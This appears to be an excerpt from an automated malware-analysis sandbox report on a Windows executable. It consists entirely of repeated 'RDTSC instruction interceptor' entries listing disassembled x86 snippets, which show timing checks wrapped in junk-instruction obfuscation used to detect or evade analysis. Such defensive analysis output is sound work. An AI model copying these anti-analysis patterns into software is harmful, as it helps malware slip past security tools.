              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A6A second address: BD1A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD22DB second address: BD22E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD22E1 second address: BD22E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD26C5 second address: BD26C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD26C9 second address: BD26E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD27A1 second address: BD27C1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c add dword ptr [ebp+122D31D6h], esi 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 jl 00007F65E53D9518h 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD27C1 second address: BD27C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2C2E second address: BD2CAF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65E53D9518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F65E53D9518h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jmp 00007F65E53D9529h 0x0000002c mov di, DAD3h 0x00000030 push 00000000h 0x00000032 jns 00007F65E53D9517h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F65E53D9518h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov edi, 2CEB56F4h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2CAF second address: BD2CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4EEB second address: BD4EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD5B6B second address: BD5BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F65E53D48C6h 0x0000000a pop esi 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D1D41h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 xor edi, 0F0F5A68h 0x0000001e pop edi 0x0000001f pushad 0x00000020 mov ax, si 0x00000023 call 00007F65E53D48BDh 0x00000028 mov eax, dword ptr [ebp+122D2F36h] 0x0000002e pop ebx 0x0000002f popad 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F65E53D48B8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c xchg eax, ebx 0x0000004d jmp 00007F65E53D48BCh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push edi 0x00000057 pop edi 0x00000058 jmp 00007F65E53D48BFh 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4EEF second address: BD4EF8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E57 second address: BD6E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E5B second address: BD6E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E61 second address: BD6E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E67 second address: BD6E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E6B second address: BD6E7D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F65E53D48B6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD98FA second address: BD990D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F65E53D9516h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDBDD8 second address: BDBDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65E53D48BBh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD27F second address: BDD284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD325 second address: BDD32B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD4C5 second address: BDD556 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+124759BDh], esi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F65E53D9518h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov di, si 0x00000034 pushad 0x00000035 sbb edx, 53298A82h 0x0000003b popad 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov edi, 032D3FBFh 0x00000048 mov eax, dword ptr [ebp+122D0F3Dh] 0x0000004e sbb ebx, 559973DDh 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push ecx 0x00000059 call 00007F65E53D9518h 0x0000005e pop ecx 0x0000005f mov dword ptr [esp+04h], ecx 0x00000063 add dword ptr [esp+04h], 0000001Ch 0x0000006b inc ecx 0x0000006c push ecx 0x0000006d ret 0x0000006e pop ecx 0x0000006f ret 0x00000070 mov edi, dword ptr [ebp+124759BDh] 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 jne 00007F65E53D951Ch 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF127 second address: BDF196 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65E53D48B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F65E53D48B8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov bh, 0Eh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F65E53D48B8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov ebx, esi 0x00000047 mov dword ptr [ebp+122D2C5Ch], ebx 0x0000004d push 00000000h 0x0000004f or dword ptr [ebp+122D32B0h], esi 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF196 second address: BDF19C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF19C second address: BDF1A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF1A2 second address: BDF1A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0195 second address: BE0199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE127B second address: BE12A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65E53D951Eh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE12A3 second address: BE12A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE3376 second address: BE3383 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE3383 second address: BE341E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1D41h], edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F65E53D48B8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007F65E53D48BBh 0x00000030 pushad 0x00000031 jnl 00007F65E53D48B6h 0x00000037 mov eax, dword ptr [ebp+122D2D32h] 0x0000003d popad 0x0000003e pop edi 0x0000003f mov ebx, edx 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F65E53D48B8h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000015h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d jmp 00007F65E53D48C2h 0x00000062 mov dword ptr [ebp+1247AC4Fh], eax 0x00000068 xchg eax, esi 0x00000069 jp 00007F65E53D48C4h 0x0000006f push eax 0x00000070 pushad 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE341E second address: BE3429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE3429 second address: BE342D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5B1D second address: BE5B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F65E53D9518h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b xchg eax, esi 0x0000002c push ecx 0x0000002d jno 00007F65E53D9518h 0x00000033 pop ecx 0x00000034 push eax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F65E53D9520h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5B71 second address: BE5B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6B51 second address: BE6B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F65E53D9518h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8B5E second address: BE8B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5C71 second address: BE5C7B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65E53D951Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9A8F second address: BE9A99 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65E53D48B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8D16 second address: BE8D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jne 00007F65E53D9516h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9A99 second address: BE9ABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65E53D48C1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65E53D48BAh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF0F17 second address: BF0F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF0F1D second address: BF0F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF498C second address: BF49AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65E53D9528h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49AD second address: BF49B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49B9 second address: BF49D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65E53D9516h 0x0000000a jmp 00007F65E53D951Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49D2 second address: BF49E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48BAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4B1C second address: BF4B22 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4C86 second address: BF4C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0013A second address: C0013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0013E second address: C0015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F65E53D48B6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AE3A second address: B9AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AE3F second address: B9AE71 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65E53D48C9h 0x00000008 pushad 0x00000009 jmp 00007F65E53D48C2h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AE71 second address: B9AE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9526h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e jmp 00007F65E53D951Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AE9D second address: B9AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF450 second address: BFF45A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65E53D9528h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF5BA second address: BFF5C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF5C0 second address: BFF5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF9F2 second address: BFFA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFA12 second address: BFFA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFB8F second address: BFFB99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFB99 second address: BFFBA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFCE0 second address: BFFCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F65E53D48C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFCFA second address: BFFCFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFE5B second address: BFFE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFE5F second address: BFFE6C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFE6C second address: BFFE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0449B second address: C044B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D9521h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C044B2 second address: C044C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C044C7 second address: C044CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C044CB second address: C04510 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D48B6h 0x00000008 jmp 00007F65E53D48BDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F65E53D48C1h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F65E53D48C7h 0x00000020 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04510 second address: C04514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04514 second address: C0451C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0451C second address: C04550 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65E53D953Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04550 second address: C04554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C047FE second address: C0481B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9528h 0x00000009 popad 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0520F second address: C05214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C08A0D second address: C08A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C08A1A second address: C08A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DB28 second address: C0DB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DB2E second address: C0DB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DB32 second address: C0DB51 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65E53D9516h 0x00000008 jnp 00007F65E53D9516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jmp 00007F65E53D951Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C910 second address: C0C91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F65E53D48B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA229 second address: BDA231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA231 second address: BDA235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
